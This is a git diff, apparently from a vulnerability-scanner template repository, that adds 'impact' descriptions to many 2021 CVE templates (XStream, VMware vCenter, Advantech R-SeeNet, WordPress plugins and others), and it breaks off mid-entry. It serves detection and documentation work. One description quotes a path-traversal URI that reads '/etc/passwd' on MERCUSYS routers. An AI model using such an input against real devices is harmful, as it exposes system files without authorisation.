https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6 diff --git a/http/cves/2021/CVE-2021-21315.yaml b/http/cves/2021/CVE-2021-21315.yaml index d36f09bba2..0fefe22da3 100644 --- a/http/cves/2021/CVE-2021-21315.yaml +++ b/http/cves/2021/CVE-2021-21315.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: Node.JS System Information Library System before version 5.3.1 is susceptible to remote command injection. Node.JS (npm package "systeminformation") is an open source collection of functions to retrieve detailed hardware, system and OS information. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system. remediation: Upgrade to version 5.3.1. As a workaround instead of upgrading, be sure to check or sanitize service parameters that are passed to si.inetLatency(), si.inetChecksite(), si.services(), si.processLoad() ... do only allow strings, reject any arrays. String sanitation works as expected reference: - https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC diff --git a/http/cves/2021/CVE-2021-21345.yaml b/http/cves/2021/CVE-2021-21345.yaml index 7614877da1..c7ea7c36bb 100644 --- a/http/cves/2021/CVE-2021-21345.yaml +++ b/http/cves/2021/CVE-2021-21345.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | XStream before 1.4.16 is susceptible to remote code execution. An attacker who has sufficient rights can execute host commands via manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. remediation: Install at least 1.4.16 if you rely on XStream's default blacklist of the Security Framework. reference: - https://x-stream.github.io/CVE-2021-21345.html diff --git a/http/cves/2021/CVE-2021-21351.yaml b/http/cves/2021/CVE-2021-21351.yaml index 3d1a6cd115..71925c192c 100644 --- a/http/cves/2021/CVE-2021-21351.yaml +++ b/http/cves/2021/CVE-2021-21351.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | XStream before 1.4.16 is susceptible to remote code execution. An attacker can load and execute arbitrary code from a remote host via manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. remediation: Install at least 1.4.16 if you rely on XStream's default blacklist of the Security Framework. reference: - https://github.com/vulhub/vulhub/tree/master/xstream/CVE-2021-21351 diff --git a/http/cves/2021/CVE-2021-21389.yaml b/http/cves/2021/CVE-2021-21389.yaml index dd77e79f93..7c1064af00 100644 --- a/http/cves/2021/CVE-2021-21389.yaml +++ b/http/cves/2021/CVE-2021-21389.yaml @@ -5,6 +5,8 @@ info: author: lotusdll severity: high description: WordPress BuddyPress before version 7.2.1 is susceptible to a privilege escalation vulnerability that can be leveraged to perform remote code execution. + impact: | + Successful exploitation of this vulnerability could allow an attacker to gain unauthorized access to sensitive information, escalate privileges, or execute arbitrary code on the affected system. remediation: This issue has been remediated in WordPress BuddyPress 7.2.1. reference: - https://github.com/HoangKien1020/CVE-2021-21389 diff --git a/http/cves/2021/CVE-2021-21402.yaml b/http/cves/2021/CVE-2021-21402.yaml index 7504730d05..cdc8475e0a 100644 --- a/http/cves/2021/CVE-2021-21402.yaml +++ b/http/cves/2021/CVE-2021-21402.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Jellyfin before 10.7.0 is vulnerable to local file inclusion. This issue is more prevalent when Windows is used as the host OS. Servers exposed to public Internet are potentially at risk. + impact: | + Successful exploitation could allow an attacker to read sensitive files on the server. remediation: This is fixed in version 10.7.1. reference: - https://securitylab.github.com/advisories/GHSL-2021-050-jellyfin/ diff --git a/http/cves/2021/CVE-2021-21479.yaml b/http/cves/2021/CVE-2021-21479.yaml index 7704b83310..22a61e7e3b 100644 --- a/http/cves/2021/CVE-2021-21479.yaml +++ b/http/cves/2021/CVE-2021-21479.yaml @@ -7,6 +7,8 @@ info: description: | SCIMono before 0.0.19 is vulnerable to remote code execution because it is possible for an attacker to inject and execute java expressions and compromise the availability and integrity of the system. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. remediation: | Upgrade SCIMono to version 0.0.19 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-21745.yaml b/http/cves/2021/CVE-2021-21745.yaml index 03eb0255b8..a80423ab4f 100644 --- a/http/cves/2021/CVE-2021-21745.yaml +++ b/http/cves/2021/CVE-2021-21745.yaml @@ -7,6 +7,8 @@ info: description: | ZTE MF971R product has a Referer authentication bypass vulnerability. Without CSRF verification, an attackercould use this vulnerability to perform illegal authorization operations by sending a request to the user to click. + impact: | + An attacker can bypass authentication and gain unauthorized access to the router. remediation: | Apply the latest firmware update provided by ZTE to fix the authentication bypass vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-21799.yaml b/http/cves/2021/CVE-2021-21799.yaml index 84b6766692..fe6549bbdf 100644 --- a/http/cves/2021/CVE-2021-21799.yaml +++ b/http/cves/2021/CVE-2021-21799.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Advantech R-SeeNet 2.4.12 contains a reflected cross-site scripting vulnerability in the telnet_form.php script functionality. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by Advantech to mitigate the XSS vulnerability in R-SeeNet 2.4.12. reference: diff --git a/http/cves/2021/CVE-2021-21801.yaml b/http/cves/2021/CVE-2021-21801.yaml index af333276ef..f379605d02 100644 --- a/http/cves/2021/CVE-2021-21801.yaml +++ b/http/cves/2021/CVE-2021-21801.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: medium description: Advantech R-SeeNet contains a cross-site scripting vulnerability in the device_graph_page.php script via the graph parameter. A specially crafted URL by an attacker can lead to arbitrary JavaScript code execution. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by Advantech to fix the XSS vulnerability in the R-SeeNet application. reference: diff --git a/http/cves/2021/CVE-2021-21802.yaml b/http/cves/2021/CVE-2021-21802.yaml index 790bbd4238..acf5955387 100644 --- a/http/cves/2021/CVE-2021-21802.yaml +++ b/http/cves/2021/CVE-2021-21802.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: medium description: Advantech R-SeeNet contains a cross-site scripting vulnerability in the device_graph_page.php script via the device_id parameter. A specially crafted URL by an attacker can lead to arbitrary JavaScript code execution. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by Advantech to fix the XSS vulnerability in the R-SeeNet application. reference: diff --git a/http/cves/2021/CVE-2021-21803.yaml b/http/cves/2021/CVE-2021-21803.yaml index 67cb755ed0..90a443af79 100644 --- a/http/cves/2021/CVE-2021-21803.yaml +++ b/http/cves/2021/CVE-2021-21803.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: medium description: Advantech R-SeeNet is vulnerable to cross-site scripting via the device_graph_page.php script via the is2sim parameter. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by Advantech to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-21805.yaml b/http/cves/2021/CVE-2021-21805.yaml index e04f578486..27a43d9aa7 100644 --- a/http/cves/2021/CVE-2021-21805.yaml +++ b/http/cves/2021/CVE-2021-21805.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Advantech R-SeeNet 2.4.12 is susceptible to remote OS command execution via the ping.php script functionality. An attacker, via a specially crafted HTTP request, can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system. remediation: | Update to the latest version of Advantech R-SeeNet to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-21816.yaml b/http/cves/2021/CVE-2021-21816.yaml index fc3413e87a..9a28297cec 100644 --- a/http/cves/2021/CVE-2021-21816.yaml +++ b/http/cves/2021/CVE-2021-21816.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: medium description: D-Link DIR-3040 1.13B03 is susceptible to information disclosure in the Syslog functionality. A specially crafted HTTP network request can lead to the disclosure of sensitive information. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain sensitive information from the router, potentially leading to further attacks. remediation: | Upgrade the router firmware to the latest version provided by D-Link. reference: diff --git a/http/cves/2021/CVE-2021-21881.yaml b/http/cves/2021/CVE-2021-21881.yaml index 252a994146..f3616a2558 100644 --- a/http/cves/2021/CVE-2021-21881.yaml +++ b/http/cves/2021/CVE-2021-21881.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: Lantronix PremierWave 2050 8.9.0.0R4 contains an OS command injection vulnerability. A specially-crafted HTTP request can lead to command in the Web Manager Wireless Network Scanner. An attacker can make an authenticated HTTP request to trigger this vulnerability. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, or complete compromise of the affected device. remediation: | Apply the latest firmware update provided by Lantronix to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-21972.yaml b/http/cves/2021/CVE-2021-21972.yaml index ef9460bab1..f0862babc4 100644 --- a/http/cves/2021/CVE-2021-21972.yaml +++ b/http/cves/2021/CVE-2021-21972.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: VMware vCenter vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2). + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the necessary security patches or updates provided by VMware to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-21973.yaml b/http/cves/2021/CVE-2021-21973.yaml index e41937800f..64bb755787 100644 --- a/http/cves/2021/CVE-2021-21973.yaml +++ b/http/cves/2021/CVE-2021-21973.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: medium description: VMware vSphere (HTML5) is susceptible to server-side request forgery due to improper validation of URLs in a vCenter Server plugin. An attacker with network access to port 443 can exploit this issue by sending a POST request to the plugin. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l, and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2). + impact: | + Successful exploitation of this vulnerability could allow an attacker to send arbitrary requests from the vulnerable server, potentially leading to unauthorized access, data leakage, or further attacks. remediation: | Apply the necessary security patches or updates provided by VMware to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-21975.yaml b/http/cves/2021/CVE-2021-21975.yaml index 3e3707d769..1a88465a5f 100644 --- a/http/cves/2021/CVE-2021-21975.yaml +++ b/http/cves/2021/CVE-2021-21975.yaml @@ -5,6 +5,8 @@ info: author: luci severity: high description: vRealize Operations Manager API is susceptible to server-side request forgery. A malicious actor with network access to the vRealize Operations Manager API can steal administrative credentials or trigger remote code execution using CVE-2021-21983. + impact: | + Successful exploitation of this vulnerability could allow an attacker to send arbitrary requests from the vulnerable server, potentially leading to unauthorized access, data leakage, or further attacks. remediation: | Apply the necessary security patches or updates provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-21978.yaml b/http/cves/2021/CVE-2021-21978.yaml index 1fde947a09..f13f6611fe 100644 --- a/http/cves/2021/CVE-2021-21978.yaml +++ b/http/cves/2021/CVE-2021-21978.yaml @@ -8,6 +8,8 @@ info: VMware View Planner 4.x prior to 4.6 Security Patch 1 contains a remote code execution vulnerability due to improper input validation and lack of authorization leading to arbitrary file upload in logupload web application. An unauthorized attacker with network access to View Planner Harness could upload and execute a specially crafted file leading to remote code execution within the logupload container. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade to VMware View Planner version 4.6 SP1 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-21985.yaml b/http/cves/2021/CVE-2021-21985.yaml index a9813fb595..15a25acdeb 100644 --- a/http/cves/2021/CVE-2021-21985.yaml +++ b/http/cves/2021/CVE-2021-21985.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the necessary security patches or updates provided by VMware to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-22005.yaml b/http/cves/2021/CVE-2021-22005.yaml index 13adc4933a..96e744524b 100644 --- a/http/cves/2021/CVE-2021-22005.yaml +++ b/http/cves/2021/CVE-2021-22005.yaml @@ -5,6 +5,8 @@ info: author: PR3R00T severity: critical description: VMware vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file. + impact: | + Allows an attacker to upload and execute arbitrary files on the target system remediation: | Apply the necessary security patches or updates provided by VMware reference: diff --git a/http/cves/2021/CVE-2021-22053.yaml b/http/cves/2021/CVE-2021-22053.yaml index 82c3b70e18..4b0e58ea22 100644 --- a/http/cves/2021/CVE-2021-22053.yaml +++ b/http/cves/2021/CVE-2021-22053.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Spring Cloud Netflix Hystrix Dashboard prior to version 2.2.10 is susceptible to remote code execution. Applications using both `spring-cloud-netflix-hystrix-dashboard` and `spring-boot-starter-thymeleaf` expose a way to execute code submitted within the request URI path during the resolution of view templates. When a request is made at `/hystrix/monitor;[user-provided data]`, the path elements following `hystrix/monitor` are being evaluated as SpringEL expressions, which can lead to code execution. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. remediation: | Upgrade to Spring Cloud Netflix Hystrix Dashboard version 2.2.10 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-22054.yaml b/http/cves/2021/CVE-2021-22054.yaml index cb6350a7b7..e8089be02b 100644 --- a/http/cves/2021/CVE-2021-22054.yaml +++ b/http/cves/2021/CVE-2021-22054.yaml @@ -5,6 +5,8 @@ info: author: h1ei1 severity: high description: VMware Workspace ONE UEM console 20.0.8 prior to 20.0.8.37, 20.11.0 prior to 20.11.0.40, 21.2.0 prior to 21.2.0.27, and 21.5.0 prior to 21.5.0.37 contain a server-side request forgery vulnerability. This issue may allow a malicious actor with network access to UEM to send their requests without authentication and to gain access to sensitive information. + impact: | + An attacker can exploit this vulnerability to send crafted requests to internal resources, potentially leading to unauthorized access or information disclosure. remediation: | Apply the necessary patches or updates provided by VMWare to fix the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-22122.yaml b/http/cves/2021/CVE-2021-22122.yaml index 422b517aa4..68014e9aae 100644 --- a/http/cves/2021/CVE-2021-22122.yaml +++ b/http/cves/2021/CVE-2021-22122.yaml @@ -1,11 +1,13 @@ id: CVE-2021-22122 info: - name: FortiWeb - Cross-Site Scripting + name: FortiWeb - Cross Site Scripting author: dwisiswant0 severity: medium description: | FortiWeb 6.3.0 through 6.3.7 and versions before 6.2.4 contain an unauthenticated cross-site scripting vulnerability. Improper neutralization of input during web page generation can allow a remote attacker to inject malicious payload in vulnerable API end-points. + impact: | + Successful exploitation of this vulnerability can result in the compromise of sensitive user information, session hijacking. remediation: | Apply the latest security patches or updates provided by Fortinet to fix the XSS vulnerability in FortiWeb. reference: diff --git a/http/cves/2021/CVE-2021-22145.yaml b/http/cves/2021/CVE-2021-22145.yaml index e8fcc2023b..1e2722c3f2 100644 --- a/http/cves/2021/CVE-2021-22145.yaml +++ b/http/cves/2021/CVE-2021-22145.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: medium description: ElasticSsarch 7.10.0 to 7.13.3 is susceptible to information disclosure. A user with the ability to submit arbitrary queries can submit a malformed query that results in an error message containing previously used portions of a data buffer. This buffer can contain sensitive information such as Elasticsearch documents or authentication details, thus potentially leading to data modification and/or execution of unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive information. remediation: | Upgrade Elasticsearch to a version that is not affected by CVE-2021-22145. reference: diff --git a/http/cves/2021/CVE-2021-22205.yaml b/http/cves/2021/CVE-2021-22205.yaml index 38b481b42f..19ddaa6f36 100644 --- a/http/cves/2021/CVE-2021-22205.yaml +++ b/http/cves/2021/CVE-2021-22205.yaml @@ -5,6 +5,8 @@ info: author: GitLab Red Team severity: critical description: GitLab CE/EE starting from 11.9 does not properly validate image files that were passed to a file parser, resulting in a remote command execution vulnerability. This template attempts to passively identify vulnerable versions of GitLab without the need for an exploit by matching unique hashes for the application-.css file in the header for unauthenticated requests. Positive matches do not guarantee exploitability. Tooling to find relevant hashes based on the semantic version ranges specified in the CVE is linked in the references section below. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected GitLab instance. remediation: | Upgrade to GitLab CE/EE version 13.10.3 or 13.11.1 to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-22214.yaml b/http/cves/2021/CVE-2021-22214.yaml index 2e91a4bb49..3cc570cd1d 100644 --- a/http/cves/2021/CVE-2021-22214.yaml +++ b/http/cves/2021/CVE-2021-22214.yaml @@ -9,6 +9,8 @@ info: - CVE-2021-39935 - CVE-2021-22214 - CVE-2021-22175 + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to internal resources, potential data leakage, and further attacks on the system. remediation: | Upgrade Gitlab CE/EE to a version that is not affected by the vulnerability (10.6 or higher). reference: diff --git a/http/cves/2021/CVE-2021-22873.yaml b/http/cves/2021/CVE-2021-22873.yaml index f0e819e358..0715005537 100644 --- a/http/cves/2021/CVE-2021-22873.yaml +++ b/http/cves/2021/CVE-2021-22873.yaml @@ -5,6 +5,8 @@ info: author: pudsec severity: medium description: Revive Adserver before 5.1.0 contains an open redirect vulnerability via the dest, oadest, and ct0 parameters of the lg.php and ck.php delivery scripts. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + Successful exploitation of this vulnerability could allow an attacker to redirect users to malicious websites, leading to phishing attacks or the execution of further attacks. remediation: | Upgrade Revive Adserver to version 5.1.0 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-22911.yaml b/http/cves/2021/CVE-2021-22911.yaml index 68fb332a78..4c8c8c3a3d 100644 --- a/http/cves/2021/CVE-2021-22911.yaml +++ b/http/cves/2021/CVE-2021-22911.yaml @@ -5,6 +5,8 @@ info: author: tess,sullo severity: critical description: Rocket.Chat 3.11, 3.12 and 3.13 contains a NoSQL injection vulnerability which allows unauthenticated access to an API endpoint. An attacker can possibly obtain sensitive information from a database, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary NoSQL queries, leading to unauthorized access, data manipulation, or denial of service. remediation: | Upgrade Rocket.Chat to a version higher than 3.13 or apply the provided patch to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-22986.yaml b/http/cves/2021/CVE-2021-22986.yaml index 48afbdf66a..2117b77299 100644 --- a/http/cves/2021/CVE-2021-22986.yaml +++ b/http/cves/2021/CVE-2021-22986.yaml @@ -5,6 +5,8 @@ info: author: rootxharsh,iamnoooob severity: critical description: F5 iControl REST interface is susceptible to remote command execution. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. This affects BIG-IP 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3; and BIG-IQ 7.1.0.x before 7.1.0.3 and 7.0.0.x before 7.0.0.2. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the target system. remediation: | Apply the necessary security patches or updates provided by F5 Networks to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-23241.yaml b/http/cves/2021/CVE-2021-23241.yaml index 896861a941..68e278e1da 100644 --- a/http/cves/2021/CVE-2021-23241.yaml +++ b/http/cves/2021/CVE-2021-23241.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: MERCUSYS Mercury X18G 1.0.5 devices are vulnerable to local file inclusion via ../ in conjunction with a loginLess or login.htm URI (for authentication bypass) to the web server, as demonstrated by the /loginLess/../../etc/passwd URI. + impact: | + An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the router. remediation: | Apply the latest firmware update provided by the vendor to fix the LFI vulnerability and ensure proper input validation is implemented. reference: diff --git a/http/cves/2021/CVE-2021-24145.yaml b/http/cves/2021/CVE-2021-24145.yaml index 8da2779bdb..3e724f310a 100644 --- a/http/cves/2021/CVE-2021-24145.yaml +++ b/http/cves/2021/CVE-2021-24145.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress Modern Events Calendar Lite plugin before 5.16.5 is susceptible to authenticated arbitrary file upload. The plugin does not properly check the imported file, allowing PHP files to be uploaded and/or executed by an administrator or other high-privilege user using the text/csv content-type in the request. This can possibly lead to remote code execution. + impact: | + Remote code execution remediation: Fixed in version 5.16.5. reference: - https://wpscan.com/vulnerability/f42cc26b-9aab-4824-8168-b5b8571d1610 diff --git a/http/cves/2021/CVE-2021-24146.yaml b/http/cves/2021/CVE-2021-24146.yaml index 6fe33982e4..8be65ddc98 100644 --- a/http/cves/2021/CVE-2021-24146.yaml +++ b/http/cves/2021/CVE-2021-24146.yaml @@ -5,6 +5,8 @@ info: author: random_robbie severity: high description: WordPress Modern Events Calendar Lite before 5.16.5 does not properly restrict access to the export files, allowing unauthenticated users to exports all events data in CSV or XML format. + impact: | + An attacker can exploit this vulnerability to gain access to sensitive information, such as user credentials or database contents. remediation: | Update to the latest version of the Modern Events Calendar Lite plugin (5.16.5 or higher) to fix the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24150.yaml b/http/cves/2021/CVE-2021-24150.yaml index 311285082e..437efc6dec 100644 --- a/http/cves/2021/CVE-2021-24150.yaml +++ b/http/cves/2021/CVE-2021-24150.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress Like Button Rating plugin before 2.6.32 is susceptible to server-side request forgery. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to make requests to internal resources, potentially leading to unauthorized access or information disclosure. remediation: | Update the WordPress Like Button Rating plugin to version 2.6.32 or later. reference: diff --git a/http/cves/2021/CVE-2021-24155.yaml b/http/cves/2021/CVE-2021-24155.yaml index 66915fe945..54162db752 100644 --- a/http/cves/2021/CVE-2021-24155.yaml +++ b/http/cves/2021/CVE-2021-24155.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress Backup Guard plugin before 1.6.0 is susceptible to authenticated arbitrary file upload. The plugin does not ensure that imported files are in SGBP format and extension, allowing high-privilege users to upload arbitrary files, including PHP, possibly leading to remote code execution. + impact: | + Remote code execution remediation: Fixed in version 1.6.0. reference: - https://wpscan.com/vulnerability/d442acac-4394-45e4-b6bb-adf4a40960fb diff --git a/http/cves/2021/CVE-2021-24165.yaml b/http/cves/2021/CVE-2021-24165.yaml index f330c0f405..6e4d03e350 100644 --- a/http/cves/2021/CVE-2021-24165.yaml +++ b/http/cves/2021/CVE-2021-24165.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Ninja Forms plugin before 3.4.34 contains an open redirect vulnerability via the wp_ajax_nf_oauth_connect AJAX action, due to the use of a user-supplied redirect parameter and no protection in place. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware. remediation: | Update to the latest version of the Ninja Forms plugin (3.4.34 or higher) to fix the open redirect vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24169.yaml b/http/cves/2021/CVE-2021-24169.yaml index 5e659da917..36138e41fc 100644 --- a/http/cves/2021/CVE-2021-24169.yaml +++ b/http/cves/2021/CVE-2021-24169.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Advanced Order Export For WooCommerce plugin before 3.1.8 contains an authenticated cross-site scripting vulnerability via the tab parameter in the admin panel. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Authenticated users can execute arbitrary scripts on the affected WordPress site, leading to potential data theft, defacement, or further compromise. remediation: Fixed in version 3.1.8. reference: - https://wpscan.com/vulnerability/09681a6c-57b8-4448-982a-fe8d28c87fc3 diff --git a/http/cves/2021/CVE-2021-24176.yaml b/http/cves/2021/CVE-2021-24176.yaml index fa5198b5b3..c9b1b0cbe1 100644 --- a/http/cves/2021/CVE-2021-24176.yaml +++ b/http/cves/2021/CVE-2021-24176.yaml @@ -5,6 +5,8 @@ info: author: Ganofins severity: medium description: WordPress JH 404 Logger plugin through 1.1 contains a cross-site scripting vulnerability. Referer and path of 404 pages are not properly sanitized when they are output in the WordPress dashboard, which can lead to executing arbitrary JavaScript code. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions. remediation: | Update to the latest version of WordPress JH 404 Logger plugin (>=1.2) which addresses the XSS vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24210.yaml b/http/cves/2021/CVE-2021-24210.yaml index 476ba29200..cadecd0aec 100644 --- a/http/cves/2021/CVE-2021-24210.yaml +++ b/http/cves/2021/CVE-2021-24210.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress PhastPress plugin before 1.111 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to potential phishing attacks or the execution of other malicious activities. remediation: | Update the WordPress PhastPress plugin to version 1.111 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24214.yaml b/http/cves/2021/CVE-2021-24214.yaml index b237332eb0..49a8a29db4 100644 --- a/http/cves/2021/CVE-2021-24214.yaml +++ b/http/cves/2021/CVE-2021-24214.yaml @@ -5,6 +5,8 @@ info: author: tess severity: medium description: WordPress OpenID Connect Generic Client plugin 3.8.0 and 3.8.1 contains a cross-site scripting vulnerability. It does not sanitize the login error when output back in the login form, thereby not requiring authentication, which can be exploited with the default configuration. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the WordPress OpenID Connect Generic Client plugin (3.8.2) to fix this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24226.yaml b/http/cves/2021/CVE-2021-24226.yaml index f8a58238a6..2292d5b29d 100644 --- a/http/cves/2021/CVE-2021-24226.yaml +++ b/http/cves/2021/CVE-2021-24226.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDK severity: high description: WordPress AccessAlly plugin before 3.5.7 allows sensitive information leakage because the file \"resource/frontend/product/product-shortcode.php\" (which is responsible for the [accessally_order_form] shortcode) dumps serialize($_SERVER), which contains all environment variables. The leakage occurs on all public facing pages containing the [accessally_order_form] shortcode, and no login or administrator role is required. + impact: | + An attacker can exploit this vulnerability to gain access to sensitive information. remediation: | Upgrade AccessAlly to version 3.5.7 or higher to fix the vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24227.yaml b/http/cves/2021/CVE-2021-24227.yaml index e48d39a4a2..0048b9963b 100644 --- a/http/cves/2021/CVE-2021-24227.yaml +++ b/http/cves/2021/CVE-2021-24227.yaml @@ -5,6 +5,8 @@ info: author: theamanrawat severity: high description: Patreon WordPress before version 1.7.0 is vulnerable to unauthenticated local file inclusion that could be abused by anyone visiting the site. Exploitation by an attacker could leak important internal files like wp-config.php, which contains database credentials and cryptographic keys used in the generation of nonces and cookies. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to further compromise of the system. remediation: | Upgrade to Patreon WordPress plugin version 1.7.0 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24235.yaml b/http/cves/2021/CVE-2021-24235.yaml index 02e42fcaf7..b85b33fa53 100644 --- a/http/cves/2021/CVE-2021-24235.yaml +++ b/http/cves/2021/CVE-2021-24235.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress Goto Tour & Travel theme before 2.0 contains an unauthenticated reflected cross-site scripting vulnerability. It does not sanitize the keywords and start_date GET parameters on its Tour List page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, leading to potential data theft, session hijacking, or defacement. remediation: | Update to the latest version of the WordPress Goto Tour & Travel Theme (>=2.0) to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2021/CVE-2021-24236.yaml b/http/cves/2021/CVE-2021-24236.yaml index 8eaca4cb3c..aab70ac83e 100644 --- a/http/cves/2021/CVE-2021-24236.yaml +++ b/http/cves/2021/CVE-2021-24236.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | WordPress Imagements 